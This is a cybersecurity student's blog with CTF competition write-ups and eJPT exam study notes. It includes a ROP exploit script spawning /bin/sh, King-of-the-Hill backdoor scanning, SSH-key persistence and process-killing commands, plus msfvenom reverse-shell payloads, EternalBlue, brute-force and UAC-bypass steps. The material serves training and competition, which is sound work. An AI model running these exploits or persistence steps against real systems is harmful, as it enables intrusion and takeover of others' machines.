[~]$ whoami

Hi there, I’m Dhanraj Chavan 👋!!!

  • I’m a Master’s student at New York University at New York, specializing in Cybersecurity.
  • This is a space where I will be writing about my Cybersecurity write-ups (CTFs & Bug Bounty) and projects.
  • Feel free to reach out to me if you have any questions/suggestions.

VIVID CTF

Intro

Dhanraj Chavan, Jeetesh Gowder, Mayank Ramnani, Pratham Gupta & Sourabh Rajguru participated in the VIVID CTF finals organized by NCAE. We advanced through the qualifications and competed in the in-person finals held in Augusta, Georgia. The competition spanned four days and featured a jeopardy-style CTF, red team challenges, blue team challenges, and a king-of-the-hill round. We secured 5th place in the finals among 15 teams.

They provided us with fully functional Kali Linux and Windows machines, which we could access directly through our web browsers, similar to HackTheBox Pwnbox. Therefore, we don't have the solver scripts, but we will explain the challenges in detail. ...

November 14, 2024 · 1 min · Dhanraj Chavan

Day 1: Jeopardy-style CTF

Intro

Challenges were categorized into common CTF domains: Reverse Engineering, Web Exploitation, Binary Exploitation, Cryptography, Digital Forensics, and Networking. One of the hard challenges was:

Binary Challenge

We began by loading the binary into Binary Ninja to understand what it did and where it might be vulnerable. The binary was protected with the common mitigations: a non-executable stack (NX), stack canaries, and Address Space Layout Randomization (ASLR). These make a simple buffer overflow much harder to exploit.

Then we noticed a function that handled user input in a suspicious way: it read more data than expected and wrote it into a fixed-size buffer. This hinted that we could overwrite important data next to that buffer, possibly something like a function pointer stored in the Global Offset Table (GOT). Note that with a stack canary enabled, a stack-based overwrite like this only works if the canary value is also leaked and written back in place, or if the overwrite lands somewhere the canary does not guard.

We needed a memory address leak to get past ASLR. The binary printed some debugging info that included a memory address; from that address we could compute where libc was loaded. With NX enabled we couldn't just put shellcode on the stack, so we used a ROP chain to call system("/bin/sh") from libc.

Using a pwntools script: first we leak the address of puts, and from it derive libc's base address. Then we resolve system and the "/bin/sh" string from the same base:

  libc_base = leak - libc.symbols['puts']
  system_addr = libc_base + libc.symbols['system']
  bin_sh_addr = libc_base + next(libc.search(b'/bin/sh\x00'))

To craft the ROP payload we first find a gadget like pop rdi; ret using ROPgadget. The chain places the address of "/bin/sh" on the stack so that pop rdi; ret loads it into rdi (the first argument register in the x86-64 System V calling convention), then returns into system() to spawn the shell. The chain built by pwntools' ROP object is already a byte string, so it is appended to the padding as-is:

  payload = b'A' * offset
  payload += rop.chain()
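The leak-to-shell arithmetic above, written out as an added example that is not the team's solver script (which, as the intro says, was lost with the browser-hosted Kali box). The libc offsets, the gadget addresses, the 72-byte overflow distance and the debug line are all hypothetical stand-ins for values pwntools would read from the real binary and libc with ELF(), ROP() and libc.search(); the layout and the two checks (page-aligned base, 16-byte stack alignment before system()) are what matter:

```python
import re
import struct

# Hypothetical libc offsets and gadget locations, stand-ins for the values a
# real script reads with pwntools' ELF()/ROP() from the target's libc.
LIBC_OFFSETS = {
    "puts": 0x80ED0,        # libc.symbols['puts']
    "system": 0x50D70,      # libc.symbols['system']
    "/bin/sh": 0x1D8678,    # next(libc.search(b'/bin/sh\x00'))
    "pop rdi; ret": 0x2A3E5,
    "ret": 0x29139,
}


def p64(value: int) -> bytes:
    """Pack a 64-bit little-endian value (same as pwntools' p64)."""
    return struct.pack("<Q", value)


def parse_leak(debug_line: str) -> int:
    """Pull the first hexadecimal address out of the binary's debug output."""
    match = re.search(r"0x[0-9a-fA-F]+", debug_line)
    if match is None:
        raise ValueError("no address in debug output: %r" % debug_line)
    return int(match.group(0), 16)


def libc_base_from_leak(leaked_puts: int, puts_offset: int) -> int:
    """Derive the libc load address from a leaked puts address.

    A base that is not page-aligned means the symbol offset came from the
    wrong libc build, so fail here instead of sending a chain that crashes.
    """
    base = leaked_puts - puts_offset
    if base & 0xFFF:
        raise ValueError("libc base 0x%x is not page aligned; wrong libc?" % base)
    return base


def build_rop_chain(libc_base: int, offset: int, align_stack: bool = True) -> bytes:
    """Overflow padding followed by a chain that calls system("/bin/sh").

    Layout once the saved return address is overwritten:
        [ret]            optional: keeps rsp 16-byte aligned for system()
        [pop rdi; ret]   loads the next qword into rdi (first argument)
        [&"/bin/sh"]
        [system]
    """
    pop_rdi = libc_base + LIBC_OFFSETS["pop rdi; ret"]
    binsh = libc_base + LIBC_OFFSETS["/bin/sh"]
    system = libc_base + LIBC_OFFSETS["system"]

    chain = b""
    if align_stack:
        # glibc's system() runs a movaps on a stack slot; entering it with a
        # misaligned rsp segfaults, and a lone ret gadget is the usual fix.
        chain += p64(libc_base + LIBC_OFFSETS["ret"])
    chain += p64(pop_rdi) + p64(binsh) + p64(system)
    return b"A" * offset + chain


def exploit_payload(debug_line: str, offset: int) -> bytes:
    """End-to-end: parse the leak, locate libc, emit the payload bytes."""
    base = libc_base_from_leak(parse_leak(debug_line), LIBC_OFFSETS["puts"])
    return build_rop_chain(base, offset)


if __name__ == "__main__":
    # Constructed sample of the kind of debug line the binary printed.
    sample = "[debug] puts is at 0x7f3c2a1f0ed0"
    print(exploit_payload(sample, offset=72).hex())
```

In a real run the bytes from exploit_payload() go to the process with pwntools' sendline() after the leak has been read; the canary caveat in the text still applies, since this chain assumes the overwrite reaches the saved return address intact.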

November 14, 2024 · 2 min · Dhanraj Chavan

Day 2: Red Team

Intro

We were given multiple Linux and Windows machines to attack and gain flags from; each challenge set us up for the next few. One of the hard challenges was:

Gaining Access to Emails on Windows

We had several Windows machines in the subnet, but we had to access the emails of the user "Joe" on one of them. We had credentials for one of the Windows machines from a previous web challenge based on SQL injection, which was solved by running sqlmap against the login page. To access any of the Windows machines we had to use Remote Desktop Protocol (RDP). After logging in through RDP, our account didn't have administrator privileges and we had limited remote tooling.

We then started enumeration. We noticed Joe under C:\Users\ but didn't have access to any of his files. We first tried proxychains, since we had access to another Windows machine in the same network as this one, but after spending an hour getting the connection to work, even that machine didn't have access to Joe's account.

Then we noticed that one of the installed applications was Mozilla Thunderbird, an email client. The challenge said to find the emails, so this looked like the way in. Thunderbird stores each user's emails, account details and saved credentials in their own profile directory, typically found at:

  C:\Users\<username>\AppData\Roaming\Thunderbird\Profiles\<randomstring>.default\

The profile holds several key files:
  • prefs.js: configuration and account settings (mail server hostnames, ports, user names)
  • key4.db and logins.json: saved passwords, encrypted; logins.json holds the encrypted entries and key4.db the key that unlocks them, so both are needed together
  • .mab / .sqlite files: address books and other metadata
  • Mail/ and ImapMail/: the stored emails themselves, in MBOX or Maildir-style formats

But we still needed Joe's local password. We found it in the system login log files, which were not stored securely: they sat in the backups directory. We then logged into Thunderbird with Joe's credentials and could see his emails, but the contents were encrypted. Using CyberChef, we decrypted them with the Blowfish Decrypt operation and got the flag.
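Reading a profile's account configuration out of prefs.js is the first thing to do once a Thunderbird directory is found, because it tells you which mail servers the client talks to, as whom, and where the mailboxes sit on disk. The following is an added example, not part of the original write-up: a small parser for the user_pref("name", value); line format that Thunderbird (and Firefox) use. The sample prefs.js content, hostnames and user names are constructed for this example; decrypting the saved logins from logins.json/key4.db is a separate step that needs the NSS key database and is not shown here.

```python
import json
import re
from collections import defaultdict

# Constructed sample of a Thunderbird prefs.js (hostnames and names are made up).
SAMPLE_PREFS_JS = r'''
# Mozilla User Preferences
user_pref("mail.account.account1.identities", "id1");
user_pref("mail.account.account1.server", "server1");
user_pref("mail.accountmanager.accounts", "account1");
user_pref("mail.identity.id1.useremail", "joe@corp.example");
user_pref("mail.server.server1.hostname", "mail.corp.example");
user_pref("mail.server.server1.port", 993);
user_pref("mail.server.server1.type", "imap");
user_pref("mail.server.server1.userName", "joe");
user_pref("mail.server.server1.socketType", 3);
user_pref("mail.server.server1.directory", "C:\\Users\\joe\\AppData\\Roaming\\Thunderbird\\Profiles\\abcd1234.default\\ImapMail\\mail.corp.example");
user_pref("signon.rememberSignons", true);
'''

# user_pref("<name>", <value>);  -- the value is a JSON-style literal.
PREF_RE = re.compile(r'^user_pref\("((?:[^"\\]|\\.)*)",\s*(.*)\);\s*$')

# Thunderbird's mail.server.*.socketType values.
SOCKET_TYPES = {0: "plaintext", 2: "STARTTLS", 3: "SSL/TLS"}


def parse_prefs_js(text):
    """Turn user_pref("name", value); lines into a dict.

    Values are strings, integers or booleans written as JSON-compatible
    literals, so json.loads decodes them, including the escaped backslashes
    in Windows paths. Comment and blank lines do not match and are skipped.
    """
    prefs = {}
    for line in text.splitlines():
        m = PREF_RE.match(line.strip())
        if m:
            prefs[m.group(1)] = json.loads(m.group(2))
    return prefs


def mail_servers(prefs):
    """Group mail.server.<id>.<setting> keys into one dict per server."""
    servers = defaultdict(dict)
    for key, value in prefs.items():
        parts = key.split(".")
        if len(parts) >= 4 and parts[0] == "mail" and parts[1] == "server":
            servers[parts[2]][".".join(parts[3:])] = value
    return dict(servers)


def summarize(servers):
    """One line per server: protocol, user, host, port, TLS mode, mail store."""
    lines = []
    for sid, s in sorted(servers.items()):
        lines.append("%s: %s://%s@%s:%s (%s), mail store %s" % (
            sid, s.get("type"), s.get("userName"), s.get("hostname"),
            s.get("port"), SOCKET_TYPES.get(s.get("socketType"), "unknown"),
            s.get("directory")))
    return lines


if __name__ == "__main__":
    for line in summarize(mail_servers(parse_prefs_js(SAMPLE_PREFS_JS))):
        print(line)
```

Point it at a real profile with open(path_to_prefs_js).read() in place of the sample; the directory setting it reports is where the MBOX/Maildir data lives, which is what you would copy off for offline reading.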

November 14, 2024 · 2 min · Dhanraj Chavan

Day 3: Blue Team

Intro

Blue team challenges were comparatively easier than the other days, as most of them involved analyzing log files, pcap files and firewall configurations. One of the interesting challenges was:

Detecting a Brute-Force Attack from Windows Logs

We started by looking at the Windows Event Logs, specifically the Security and System logs, since they record login attempts and network connections. To open these logs we used the built-in Event Viewer. The logs contain thousands of entries, making suspicious activity hard to spot at first glance, so we applied filters for events that indicate failed login attempts. In Windows these show up under specific event IDs, for example Event ID 4625 (An account failed to log on).

Once we had isolated the failed logins, a pattern appeared: a single IP address showed up repeatedly, trying to log in within the same timeframe. Normal users don't fail logins that many times in a row, and not that quickly. Within the event details (the Network Information section of a 4625 event) we found the Source Network Address field listing the IP the attempts came from, and the Logon Type field, which for an RDP session is 10 (RemoteInteractive; with Network Level Authentication enabled the failure is often logged as type 3, Network, instead). By examining the related firewall logs and the event's network information, we also identified the targeted port: 3389, Remote Desktop Protocol (RDP).

We then counted how many failed login events came from that IP within the time frame; the logs clearly showed many arriving within the same second. We got the flag after answering the question "State the number of login attempts made using brute forcing?" correctly.

We learned how to use Event Viewer to find the right logs to analyze, and how to read and extract data from them.
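The counting step above is easy to do by hand once the filter is right, but it is worth having as code for a log with thousands of entries. The following is an added example, not part of the original write-up: a sliding-window detector over 4625 records of the kind you would export from Event Viewer or Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4625}. The event rows, IPs, account names and the 5-failures-in-60-seconds threshold are constructed for this example; the logon type mapping and the event IDs (4625 failed, 4624 succeeded, 4634 logoff) are Windows' own.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security-log records, one tuple per event:
# (TimeCreated, EventID, IpAddress, TargetUserName, LogonType).
SAMPLE_EVENTS = [
    ("2024-11-12 10:00:01", 4625, "10.10.5.23", "administrator", 10),
    ("2024-11-12 10:00:01", 4625, "10.10.5.23", "admin", 10),
    ("2024-11-12 10:00:01", 4625, "10.10.5.23", "joe", 10),
    ("2024-11-12 10:00:02", 4625, "10.10.5.23", "root", 10),
    ("2024-11-12 10:00:02", 4625, "10.10.5.23", "guest", 10),
    ("2024-11-12 10:00:02", 4625, "10.10.5.23", "backup", 10),
    ("2024-11-12 10:00:09", 4624, "10.10.5.23", "administrator", 10),
    ("2024-11-12 10:03:44", 4625, "10.10.5.101", "alice", 2),
    ("2024-11-12 10:41:00", 4625, "10.10.5.101", "alice", 2),
    ("2024-11-12 11:15:12", 4634, "-", "alice", 2),
]

# Windows logon types that matter for this kind of triage.
LOGON_TYPES = {2: "Interactive", 3: "Network", 10: "RemoteInteractive (RDP)"}


def parse_event(record):
    """Normalise one exported row into a dict with a real datetime."""
    ts, event_id, ip, user, logon_type = record
    return {"time": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), "id": event_id,
            "ip": ip, "user": user, "logon_type": logon_type}


def failed_logons_by_ip(events):
    """Group every 4625 by the source IP in its Network Information section."""
    failures = defaultdict(list)
    for e in events:
        if e["id"] == 4625:
            failures[e["ip"]].append(e)
    return failures


def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Flag each IP with at least `threshold` failures inside any `window`.

    Returns {ip: {"attempts": total 4625s from that IP,
                  "peak": most failures seen in one window,
                  "users": accounts tried, "logon_types": how they came in,
                  "success_from_same_ip": a 4624 also exists for that IP}}.
    The last field is the one to act on: a guess that eventually worked.
    """
    successes = {e["ip"] for e in events if e["id"] == 4624}
    results = {}
    for ip, fails in failed_logons_by_ip(events).items():
        times = sorted(f["time"] for f in fails)
        peak, start = 0, 0
        for end in range(len(times)):          # two-pointer sliding window
            while times[end] - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            results[ip] = {
                "attempts": len(fails),
                "peak": peak,
                "users": sorted({f["user"] for f in fails}),
                "logon_types": sorted({LOGON_TYPES.get(f["logon_type"], str(f["logon_type"]))
                                       for f in fails}),
                "success_from_same_ip": ip in successes,
            }
    return results


if __name__ == "__main__":
    hits = detect_bruteforce([parse_event(r) for r in SAMPLE_EVENTS])
    for ip, info in hits.items():
        print(ip, info)
```

The second IP in the sample fails twice, forty minutes apart, and is correctly left alone: a threshold on total failures would have needed manual review of it, whereas the windowed count separates a user mistyping a password from a tool iterating a wordlist.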

November 14, 2024 · 2 min · Dhanraj Chavan

Day 4: King of the Hill

Intro

King of the Hill (KotH) challenges involve taking control of a server and leaving your identifier on a specified target server/application, which indicates which user/team controls that server.

Network

1. Team Subnets: Each team has a subnet containing:
   - 1 boundary VyOS router at the .1 IP, which connects to the Hill subnet.
   - 5 Kali Linux systems for offensive actions.
   - 1 flag server at the .100 IP, where each team needs to place their CTF ID in owner.txt to score points.
2. Hill Subnet (192.168.20.0/24): Contains vulnerable Linux, Windows 10, and Windows 11 flag servers. Also includes a Big Hill server that awards 3 points per poll if captured, and an off-limits Hill (VIVID Flag): a restricted flag that incurs penalties if captured.
3. Access Control and Credentials:
   - Each team's boundary router can be accessed via SSH on port 22 using vividctf:vividctf.
   - Each team's flag server is accessible via SSH on port 22222 with vividctf:vividctf.
   - Boundary routers block external incoming traffic on ports 22 and 3389 by default.
   - Each team is allowed to sabotage others by modifying configurations, except on their Kali systems.
4. Objective: Teams need to place their CTF ID in the owner.txt file on their own flag server and on as many Hill subnet flag servers as possible. Points are awarded every 60 seconds based on the contents of the owner.txt file on each server. Each team can reach the Hill subnet as well as other teams' subnets, enabling cross-network attacks and defenses.

Action Plan

1. Planning and Team Strategy: At the outset we held a team discussion to devise an action plan. Roles were distributed as follows:
   - 2 members focused on attacking: targeting opponent systems and the Hill subnet.
   - 2 members focused on defending: securing our subnet and servers.
   - 1 member focused on reconnaissance: gathering intelligence on other teams and the Hill subnet.
2. Initial Target: Routers. Our first target was the boundary routers of other teams. By compromising their routers we aimed to disrupt their communication and gain a strategic advantage, since control of the router lets us manipulate or observe their network traffic as needed.
3. Hill Subnet Reconnaissance: After running a host scan on the Hill subnet, we discovered multiple machines with active services. To identify the services running on these machines we ran a service detection scan:
     nmap -iL hill.txt -p- -sV
4. Discovery of Unusual Activity: During the scan, one machine stood out with over 500 open ports in the range 32000 to 60000. Nmap failed to identify the services on these ports because decoy listeners masked the real ones.
5. Flag Server Review: When we obtained access to our flag server, we reviewed all open ports and running services on the machine. We found a Python service running on a randomized port between 40000 and 60000 that would grant anyone backdoor access to the machine given the correct string as input. Our assumption was that the initial state of all flag servers in the competition was the same, so the backdoor would exist on every team's flag server.
6. Automated Port Scans: Our assumption was proven correct when we scanned the range 40000-60000 on another team's flag server and found one port giving different output from the others:
     for port in {40000..60000}; do nc 192.168.2.100 $port; done
   This iterates through the ports and shows any unexpected responses. (nc blocks on a port that accepts the connection but never replies, so a per-connection timeout such as nc -w 1 keeps the loop from stalling.)
7. Exploiting the Backdoor: Once the port was identified, exploiting the backdoor was as simple as sending the crafted payload after connecting with the netcat command above. The backdoor gave us a limited /bin/sh shell, which we upgraded to a full-featured one with:
     /bin/bash -i
   We now had full access to the flag servers of multiple teams. We also patched the running backdoor on our own flag server so other teams could not compromise us the same way.
8. Claiming Flag Servers: Scoring was based on which team's flag was in the /root/owner.txt file of each flag server. Initially we edited owner.txt to claim ownership and earn 3 points per minute. However, we had not established persistence, and an opposing team eventually removed our access by killing our shell process and patching the backdoor.
9. Web Server Exploitation: On further analysis of the flag server, we also discovered a running web server:
     Nmap scan report for 192.168.2.100
     Host is up (0.00048s latency).
     Not shown: 999 closed tcp ports (reset)
     PORT   STATE SERVICE VERSION
     80/tcp open  http    Node.js Express framework
   Through reconnaissance and testing we identified a command injection vulnerability in the web application, and exploiting it gave us a second way back into the machine.
10. Establishing Persistence: This time, so as not to be kicked out of the flag servers by opposing teams, our first goal was persistence. This took a few steps:
   - Putting our SSH public key in ~/.ssh/authorized_keys:
       echo "ssh-rsa <public-key> mayank" > ~/.ssh/authorized_keys
   - Changing the root password to something only our team knew.
   - Kicking everyone else off the server by terminating their bash processes:
       current_pid=$$; for pid in $(pgrep -x bash | grep -v "$current_pid"); do kill -9 $pid; done
   Doing this on a few flag servers gave us full, exclusive access to multiple flag servers.
11. Locked Permissions and Claiming Flags: Upon regaining persistent access, we found that owner.txt had been locked with chattr, preventing us from modifying it. We discovered this by getting errors when writing to the file even though we were root, the file was owned by root, and its mode was 0644. Running lsattr confirmed that the immutable attribute (i) had been set: an immutable file cannot be written, renamed or deleted even by root until the attribute is cleared with chattr -i. Additionally, the chattr binary had been removed from its original location in /bin/. This step, likely carried out by the opposing team before we kicked them, was meant to stop us from claiming points. However, on searching the whole filesystem for the chattr binary, we found it hidden in a randomly named directory:
       find / -name chattr 2>/dev/null
     Output:
       /var/7cy7grc93q97c/chattr
   Using that binary we cleared the attribute on owner.txt, wrote our flag into the file and started gaining points. We then used chattr to make owner.txt immutable again on our own flag server and on every flag server we had pwned, to make it harder for an opposing team to change the file even if we somehow lost access. That did not happen.

Summary

Before the King of the Hill segment we were in 11th place; after it our team ended up in 5th. Being fast, constantly monitoring the machines we owned for suspicious activity, and continuously attacking other teams ensured we did very well in this part of the competition, leading to a substantial gain in rank. We learned about conducting reconnaissance, finding vulnerabilities through code review, exploiting servers through known vectors and maintaining persistence after compromising a machine. ...
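The backdoor hunt in steps 4 to 6 relies on one observation: hundreds of decoy ports answer identically and the real service is the one that answers differently. The following is an added example, not part of the team's write-up: a sweep over a port range with a per-connection timeout (the thing the plain nc loop lacks) that groups the replies and reports the outliers. The target address, the port range, the newline probe and the decoy/backdoor banners in the test are assumptions for this example; the sweep itself only runs when the file is executed directly.

```python
import socket
from collections import Counter


def grab_banner(host, port, timeout=1.0, probe=b"\n"):
    """Connect, send a newline, return what the service says.

    Returns None when the connection is refused or times out, b"" when the
    port accepts but stays silent, otherwise the first bytes it sends. The
    timeout is what keeps one silent listener from stalling the whole sweep.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            s.sendall(probe)
            try:
                return s.recv(256)
            except socket.timeout:
                return b""
    except OSError:
        return None


def sweep(host, ports, timeout=1.0, grab=grab_banner):
    """Map port -> banner for every port that accepted the connection."""
    results = {}
    for port in ports:
        banner = grab(host, port, timeout)
        if banner is not None:
            results[port] = banner
    return results


def outlier_ports(banners, min_majority=3):
    """Ports whose reply differs from the most common reply.

    Decoys are identical by construction; the backdoor is whatever does not
    match them. If there is no clear majority (fewer than `min_majority`
    identical replies) every port is returned for manual review.
    """
    if not banners:
        return []
    common, n = Counter(banners.values()).most_common(1)[0]
    if n < min_majority:
        return sorted(banners)
    return sorted(p for p, b in banners.items() if b != common)


if __name__ == "__main__":
    # Assumed target and range from the write-up; slow, but that is the sweep.
    hits = sweep("192.168.2.100", range(40000, 60001), timeout=0.5)
    for p in outlier_ports(hits):
        print(p, hits[p])
```

Once the outlier port is known, the payload goes to it with the same connect-and-send pattern; a defender on the flag server can run the identical sweep against localhost to confirm the backdoor is gone after patching it.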

November 14, 2024 · 6 min · Dhanraj Chavan

EJPT Notes

Assessment Methodologies

Passive Information Gathering

Website Recon & Footprinting
  • IP Addresses: host <domain>
  • Directories: robots.txt, sitemap.xml
  • Names, Emails, Phone Numbers, Physical Addresses
  • Web Technologies Used:
      BuiltWith → Firefox add-on (recommended)
      Wappalyzer → browser extension
      whatweb <domain> → Linux tool
      webhttrack → website copier
  • Whois Enumeration: https://who.is, whois <domain>
  • Website Footprinting with Netcraft: https://netcraft.com
  • DNS Recon: dnsrecon -d <domain> (Kali Linux tool), https://dnsdumpster.com/
  • WAF detection: wafw00f
  • Subdomain Enumeration: Sublist3r
  • Google Dorks: cache:ine.com; Exploit-DB (Google Hacking Database) dorks
  • Email Harvesting: theHarvester
  • Leaked Password Databases: HaveIBeenPwned?

Active Information Gathering
  • DNS Zone Transfer
  • /etc/hosts → local DNS
  • dnsenum, dig, fierce, nmap, netdiscover

Footprinting & Scanning

Host Discovery Techniques
  • Ping Sweeps → ICMP Echo Requests → tool: fping
      fping -a -g 10.10.23.0/24
  • ARP Scanning
  • TCP SYN Ping → half-open
  • UDP Ping
  • TCP ACK Ping
  • SYN-ACK Ping → sends SYN-ACK packets
  • NMAP Scripts → /usr/share/nmap/scripts/

Firewall/IDS Evasion
  • -f → fragment IP packets
  • -D → decoys
  • -sn vs -Pn:
      -sn → ping scan only: tells Nmap not to scan any ports and rely on its host-discovery probes (ICMP echo, TCP SYN/ACK to 443/80, ARP on the local network) to identify live targets
      -Pn → skip host discovery entirely, treat every target as up and go straight to the port scan

Types of Scans:
  • TCP Connect Scans (-sT)
  • SYN "Half-open" Scans (-sS)
  • UDP Scans (-sU)
  • TCP Null Scans (-sN) → sent with no flags set at all. As per the RFC, the target host should respond with a RST if the port is closed.
  • TCP FIN Scans (-sF) → a request is sent with only the FIN flag (usually used to gracefully close an active connection). Nmap expects a RST if the port is closed.
  • TCP Xmas Scans (-sX) → sends a TCP packet with the FIN, PSH and URG flags set and expects a RST response for closed ports.
  • If a UDP port doesn't respond to an Nmap probe, it is marked open|filtered
  • NULL, FIN and Xmas scans → firewall evasion; they only work against RFC-compliant TCP stacks
  • Microsoft Windows → responds to a NULL, FIN or Xmas scan with a RST for every port, so every port looks closed

Zenmap topology colours:
  • Green → machine is alive
  • Red → machine is alive but not responding or not directly accessible
  • Yellow → the host we launched the scan from (the attacker machine); the other hosts are plotted with hostname and IP address relative to localhost

  nmap -Pn -p 134,177,234 -sUV 192.156.4.3 --script=discovery

FFUF

You can use any custom keyword instead of FUZZ; define it as wordlist.txt:KEYWORD:
  ffuf -u http://10.10.199.197/NORAJ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt:NORAJ

Generic list of files such as raft-medium-files-lowercase.txt:
  ffuf -u http://10.10.199.197/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt

To hide the progress output, append 2>/dev/null.

Directories:
  ffuf -u http://10.10.199.197/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt

By adding -fc 403 (filter code) we hide every 403 response from the output.
  -mc 200 → only show 200 responses
  -fr <regex> → filter out responses matching a regexp

Audit: https://cisofy.com/lynis/

Penetration Testing

Windows Vulnerabilities
  • Windows IIS - Port 80, 443
  • WebDAV - Port 80, 443
  • SMB/CIFS - Port 445
  • RDP - Port 3389
  • WinRM - Port 5985 (HTTP) / 5986 (HTTPS)

Exploit - WebDAV on IIS
  nmap -sV -p 80 --script=http-enum <target>
  hydra -L <username-list> -P <password-list> <target> http-get /webdav/
  davtest -auth user:password -url <url>
  cadaver <url>  → enter username & password, then: put <webshell-path>
  Webshells → /usr/share/webshells
  dir C:/ & type C:/<filepath>   (run through the uploaded webshell)
  msfvenom -p windows/meterpreter/reverse_tcp LHOST=<my-ip> LPORT=1234 -f asp > shell.asp
  service postgresql start && msfconsole
  use multi/handler   → listener for the payload created with msfvenom
  set payload windows/meterpreter/reverse_tcp
  show options
  set LHOST & LPORT, then run

Exploit - SMB: PsExec
  nmap -sV -sC <target>
  scanner/smb/smb_login
  psexec.py Administrator@192.168.1.1
  Usernames: /usr/share/metasploit-framework/data/wordlists/common_users.txt
  exploit/windows/smb/psexec

Exploit - SMB: EternalBlue (MS17-010)
  https://github.com/3ndG4me/AutoBlue-MS17-010
  cd shellcode
  ./shell_prep.sh → enter Y, your IP, LPORT, Regular Shell, Stageless
  nc -lvnp 1234
  python eternalblue_exploitX.py <target IP> shellcode/sc_x64.bin   (X = the script matching the target's Windows version, e.g. eternalblue_exploit7.py)
  Method 2: Metasploit
  use windows/smb/ms17_010_eternalblue

Exploit - RDP
  use auxiliary/scanner/rdp/rdp_scanner → set RHOSTS & RPORT → to detect RDP
  hydra -L <username-wordlist> -P <password-wordlist> rdp://<target> -s <PORT>
  xfreerdp /u:<username> /p:<password> /v:<target>:<port>

Exploit - WinRM (Port 5985)
  crackmapexec winrm <target-ip> -u <username> -p <wordlist-path>
  crackmapexec winrm <target> -u <username> -p <password> -x <command>
  evil-winrm.rb -u <username> -p <password> -i <target>
  use exploit/windows/winrm/winrm_script_exec
  set FORCE_VBS true
  set username & password
  exploit

  > use auxiliary/scanner/winrm/winrm_auth_methods
  > use auxiliary/scanner/winrm/winrm_login
  > set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
  > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
  > set VERBOSE false
  > use auxiliary/scanner/winrm/winrm_cmd
  > set USERNAME administrator
  > set PASSWORD tinkerbell
  > set cmd whoami
  > run
  > use exploit/windows/winrm/winrm_script_exec
  > set USERNAME <>
  > set PASSWORD <>
  > set LHOST <IP>
  > set FORCE_VBS true
  > run
  > sysinfo

Privilege Escalation - Windows
  Windows-Exploit-Suggester - https://github.com/AonCyberLabs/Windows-Exploit-Suggester
  Copy the output of systeminfo to a txt file, then:
  ./windows-exploit-suggester.py --update
  ./windows-exploit-suggester.py --database <filename.xls> --systeminfo <path-to-txt-file>
  Windows-Kernel-Exploits - https://github.com/SecWiki/windows-kernel-exploits
  Download the specific exploit, upload it through the Meterpreter shell and run .\<exploit>.exe
  Meterpreter → getsystem → escalate privileges
  use multi/recon/local_exploit_suggester → to find applicable local exploits

Exploit - UAC
  UAC → User Account Control → Windows security feature used to prevent unauthorized changes to the OS. It ensures that changes to the OS require approval from an administrator or a user account that is a member of the Administrators group.
  https://github.com/hfiref0x/UACME
  net users
  net localgroup administrators
  use exploit/windows/http/rejetto_hfs_exec
  pgrep explorer → PID
  migrate <PID> → moves from the x86 process into the x64 explorer.exe
  msfvenom -p windows/meterpreter/reverse_tcp LHOST=<my-ip> LPORT=1234 -f exe > backdoor.exe
  upload backdoor.exe
  upload /root/Desktop/Tools/UACME/Akagi64.exe
  .\Akagi64.exe 23 C:\Temp\backdoor.exe

Enumeration

Importing Nmap results into MSF
  service postgresql start
  msfconsole
  msf> db_status
  msf> workspace
  msf> workspace -a <name>            // create a new workspace
  msf> db_import <path_to_file>
  msf> hosts                          // check whether the data imported successfully
  msf> services                       // check whether the data imported successfully
  msf> db_nmap -Pn -sV -O 10.4.22.173 // results are saved in the MSF DB

Port Scanning with Auxiliary Modules
  service postgresql start
  msfconsole
  msf> workspace -a portscan
  msf> search portscan
  msf> use <module_name> / <index>    // e.g. scanner/portscan/tcp
  msf> show options
  msf> set RHOSTS 192.168.100.43      // target IP
  msf> curl <>                        // if HTTP is open
  msf> search xoda
  msf> use <index/module_name>
  msf> show options
  msf> set RHOSTS <TARGET IP>
  msf> set TARGETURI /                // path where the service is hosted
  msf> exploit                        // gives a meterpreter session
  mp> sysinfo                         // target information
  mp> shell                           // open a shell session
  bash> ifconfig                      // identify the next target address (x.x.x.x+1)
  bash> exit                          // or CTRL + C
  mp> run autoroute -s <IP>           // IP of a machine in the internal subnet → add route
  mp> background                      // put this session in the background
  msf> sessions                       // view current sessions
  msf> search portscan
  msf> set RHOSTS <TARGET_2>          // target 1+1 (x.x.x.x+1)
  msf> run
  msf> back
  msf> search udp_sweep

  ERROR: [!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
  SOLUTION: set LHOST <BASE_MACHINE_IP>   // attacker IP

FTP Enumeration
  msf> search type:auxiliary name:ftp
  msf> use auxiliary/scanner/ftp/ftp_version
  msf> use auxiliary/scanner/ftp/ftp_login
  msf> set RHOSTS <IP>
  msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
  msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
  msf> run
  msf> use auxiliary/scanner/ftp/anonymous

SMB Enumeration
  msf> setg RHOSTS <IP>               // set a global variable
  msf> search type:auxiliary name:smb
  msf> use auxiliary/scanner/smb/smb_version
  msf> use auxiliary/scanner/smb/smb_enumusers
  msf> info                           // see info about the module
  msf> use auxiliary/scanner/smb/smb_enumshares
  msf> set ShowFiles true
  msf> use auxiliary/scanner/smb/smb_login
  msf> set SMB_USER admin
  msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
  bash> smbclient -L \\\\<IP>\\ -U admin          // -L: list all shares
  bash> smbclient \\\\<IP>\\<share> -U admin      // replace share name

Web Server Enumeration
  msf> setg RHOSTS <IP>
  msf> setg RHOST <IP>
  msf> search type:auxiliary name:http
  msf> use auxiliary/scanner/http/http_version
  msf> use auxiliary/scanner/http/http_header
  msf> use auxiliary/scanner/http/robots_txt
  msf> use auxiliary/scanner/http/dir_scanner
  msf> use auxiliary/scanner/http/files_dir
